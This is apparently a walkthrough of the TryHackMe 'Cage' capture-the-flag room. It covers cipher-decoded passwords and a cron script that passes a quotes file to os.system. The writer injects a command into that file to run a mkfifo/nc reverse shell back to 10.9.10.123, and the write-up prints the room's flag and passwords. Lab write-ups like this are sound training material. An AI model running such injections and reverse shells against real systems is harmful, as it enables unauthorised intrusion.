THM - Cage
Introduction
Help Cage bring back his acting career and investigate the nefarious goings on of his agent! Hmmmm. Sounds cheesy.
Ports
nmap says we’ve got 21 (FTP), 22 (SSH) and 80 (HTTP) only.
FTP
FTP allows anonymous login and there is one file, called dad_tasks. Downloading it and opening it we can see some sort of encoded text: UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPI… snip. You get the idea.
This is base64, and decodes to:
Qapw Eekcl - Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.
Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
Which is some sort of cipher, that looks like a rotation or Vignere. Spoiler alert - it’s not a simple rotation. Presumably Sfw is One, Faz is Two, Eljwx is Three, Rsfv is Four and Yejr is Five….
This website provides auto-solving of ciphers, and sure enough it’s vignere with the key namelesstwo:
dads tasks the rage the cage the man the legend
one revamp the website
two put more quotes in script
three buy bee pesticide
four help him with acting lessons
five teach dad what information security is
in case i forget….
Mydadisghostrideraintthatcoolnocausehesonfirejokes
The last part is the FTP and SSH password for ‘weston’
Other Files
Logging in, we can find a file called must_practice_corrupt_file.mp3 in /var/www/html/auditions, which we could also have found through dirbusting. What’s more, it contains audio steganography which we can access via Audacity and it gives the password … namelesstwo - which we already had. So, that’s not helpful.
We also find a few files in /opt/.dads_files/ There is a file called .quotes and a python script that broadcasts lines from .quotes; this apparently runs on a cron job. We can’t edit the python script but we can cat it - the contents are:
weston@national-treasure:/opt/.dads_scripts/.files$ cat ../spread_the_quotes.py #!/usr/bin/env python
#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random
lines = open(“/opt/.dads_scripts/.files/.quotes”).read().splitlines()
quote = random.choice(lines)
os.system(“wall “ + quote)
So essentially it’s choosing a random line from the .quotes file and broadcasting it via the ‘wall’ command. We can edit the .quotes file, so that’s the way forward.
We don’t have nano, but can remove the .quotes file with rm and then append something to a new .quotes with echo or printf. Theoretically, and with testing, we should be able to use a command like
echo “whatever ;pwd” » .quotes
or
echo “whatever &&pwd” » .quotes
But these don’t work, because the command doesn’t actually complete when the script runs. What we can do instead is trigger a reverse shell:
cat « EOF > /tmp/shell
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.10.123 1234 >/tmp/f
EOF
chmod +x /tmp/shell
printf ‘whatever; /tmp/shell\n’ > /opt/.dads_scripts/.files/.quotes
User Cage
This gets us a shell as cage:
listening on [any] 1234 …
connect to [10.9.10.123] from (UNKNOWN) [10.10.236.100] 52624
/bin/sh: 0: can’t access tty; job control turned off
$ python3 -c ‘import pty;pty.spawn(“/bin/bash”);’
cage@national-treasure:~$ cd /home/cage
And we can get the user flag:
cage@national-treasure:~$ cat Super_Duper_Checklist
cat Super_Duper_Checklist
1 - Increase acting lesson budget by at least 30%
2 - Get Weston to stop wearing eye-liner
3 - Get a new pet octopus
4 - Try and keep current wife
5 - Figure out why Weston has this etched into his desk: THM{M37AL_0R_P3N_T35T1NG}
Root
Cage isn’t root, but his email backups give it away; Sean has root privileges. We’re also given haiinspsyanileph and the word face as a hint. This is another vignere cipher with face as the key, and it decodes to: cageisnotalegend.
Once we know that, we can su as sean and get the root flag.